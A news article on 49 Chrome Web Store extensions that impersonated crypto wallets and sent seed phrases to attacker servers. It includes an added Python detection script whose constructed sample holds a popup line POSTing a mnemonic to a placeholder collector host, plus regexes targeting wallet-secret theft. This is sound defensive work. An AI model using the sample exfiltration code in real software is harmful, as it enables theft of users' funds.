49 New Google Chrome Extensions Caught Hijacking Cryptocurrency Wallets

Google has ousted 49 Chrome browser extensions from its Web
Store that masqueraded as cryptocurrency wallets but contained
malicious code to siphon off sensitive information and empty the
digital currencies.

The 49 browser add-ons, potentially the work of Russian threat
actors, were identified[1] (find the list
here) by researchers from MyCrypto and PhishFort.

“Essentially, the extensions are phishing for secrets — mnemonic phrases[2],
private keys, and keystore files,” explained Harry Denley, director
of security at MyCrypto. “Once the user has entered them, the
extension sends an HTTP POST request to its backend, where the bad
actors receive the secrets and empty the accounts.”
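The behaviour Denley describes (a form that asks for a seed phrase or key, paired with code that sends it to a remote host) is something a reviewer can look for statically in an unpacked extension before trusting it. The script below is an added example, not code from the article or from MyCrypto/PhishFort: it reads an extension's manifest and scripts, collects wallet-secret terms, outbound-transmission calls, remote hostnames and host permissions, and reports a triage verdict. The two embedded samples and the hostnames `collector.example` and `api.example` are constructed for the demonstration.

```python
import json
import re
from pathlib import Path

# Secrets the phishing extensions asked for, per the MyCrypto/PhishFort findings.
SECRET_TERMS = re.compile(
    r"\b(mnemonic|seed\s*phrase|recovery\s*phrase|private\s*key|keystore)\b", re.I)
# JavaScript primitives that can send data off the browser.
EXFIL_CALLS = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b")
# Absolute http(s) URLs embedded in the code.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\")`]*)?")


def load_extension_dir(path):
    """Read an unpacked extension from disk into {relative_path: text}."""
    root = Path(path)
    files = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix in (".js", ".html", ".json"):
            files[str(p.relative_to(root))] = p.read_text(errors="ignore")
    return files


def triage(files):
    """Return indicators and a verdict for one extension (files: {path: text})."""
    secret_terms, exfil_calls, remote_hosts = set(), set(), set()
    host_permissions = []
    if "manifest.json" in files:
        manifest = json.loads(files["manifest.json"])
        perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
        host_permissions = [p for p in perms if "://" in p or p == "<all_urls>"]
    for name, text in files.items():
        if not name.endswith((".js", ".html")):
            continue
        secret_terms.update(t.lower() for t in SECRET_TERMS.findall(text))
        exfil_calls.update(EXFIL_CALLS.findall(text))
        for url in URL_RE.findall(text):
            remote_hosts.add(url.split("://", 1)[1].split("/", 1)[0])
    # Asking for wallet secrets while being able to reach a remote host is the
    # pattern the article describes; secrets plus broad host permissions alone
    # is worth a manual look rather than an automatic verdict.
    if secret_terms and exfil_calls and remote_hosts:
        verdict = "suspicious"
    elif secret_terms and host_permissions:
        verdict = "review"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "secret_terms": sorted(secret_terms),
        "exfil_calls": sorted(exfil_calls),
        "remote_hosts": sorted(remote_hosts),
        "host_permissions": host_permissions,
    }


# Constructed sample mimicking the reported behaviour: a popup that asks for a
# mnemonic and POSTs it to a remote collector (hostname is a placeholder).
PHISHING_SAMPLE = {
    "manifest.json": json.dumps({
        "name": "Wallet Helper (constructed sample)", "manifest_version": 2,
        "permissions": ["storage", "https://*/*"]}),
    "popup.html": '<input id="phrase" placeholder="Enter your 12-word mnemonic">'
                  '<button id="send">Restore</button>',
    "popup.js": "document.getElementById('send').onclick = function () {\n"
                "  var phrase = document.getElementById('phrase').value;\n"
                "  fetch('https://collector.example/submit', {method: 'POST', body: phrase});\n"
                "};\n",
}

# Constructed benign sample: a price ticker that fetches public data and never
# touches wallet secrets.
BENIGN_SAMPLE = {
    "manifest.json": json.dumps({"name": "Ticker (constructed sample)",
                                 "manifest_version": 2, "permissions": ["storage"]}),
    "popup.js": "fetch('https://api.example/price').then(r => r.json())"
                ".then(d => document.body.textContent = d.price);\n",
}

if __name__ == "__main__":
    for label, sample in (("phishing", PHISHING_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, json.dumps(triage(sample), indent=2))
```

To run it against a real add-on, unpack it and call `triage(load_extension_dir("/path/to/extension"))`. The verdict is a triage signal, not proof: a genuine wallet extension also handles seed phrases and talks to its vendor's backend, so the useful check is whether every host in `remote_hosts` is one the vendor actually documents, and whether the extension's listing and publisher match the vendor at all.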

Although the offending extensions were removed within 24 hours
after they were reported to Google, MyCrypto’s analysis showed that
they began to appear on the Web Store as early as February 2020,
before ramping up in subsequent months.

In addition, all the extensions functioned alike, the only
difference being the cryptocurrency wallet brands that were
impacted — such as Ledger, Trezor, Jaxx, Electrum, MyEtherWallet,
MetaMask, Exodus, and KeepKey — via 14 unique command-and-control
(C2) servers that received the phished data.

For instance, MEW CX, the malicious add-on targeting MyEtherWallet,
was found capturing the seed phrases and transmitting them to an
attacker-controlled server with an intention to drain the victim’s
wallet of digital funds.

However, funds were not stolen from every account this way. The
researchers theorize this could be either because the criminals are
after high-value accounts only or that they have to manually sweep
the accounts.

Some of the extensions, Denley said, came with fake five-star
reviews, thus increasing the chances that an unsuspecting user
might install them.

“There was also a network of vigilant users who wrote legitimate
reviews about the extensions being malicious — however, it is hard
to say if they were victims of the phishing scams themselves, or
just helping the community to not download,” Denley added.

Data-stealing extensions have been a regular occurrence on the
Chrome Web Store, leading Google to purge them as soon as they’re
discovered. Back in February, the company removed 500 malicious
extensions[3] after they were caught serving adware and sending
users’ browsing activity to C2 servers under the control of attackers.

If you suspect you have become a victim of a malicious browser
extension and lost funds, it’s recommended you file a report at
CryptoScamDB[4].

References

  1. identified (medium.com)
  2. mnemonic phrases (en.bitcoin.it)
  3. 500 malicious extensions (thehackernews.com)
  4. CryptoScamDB (cryptoscamdb.org)
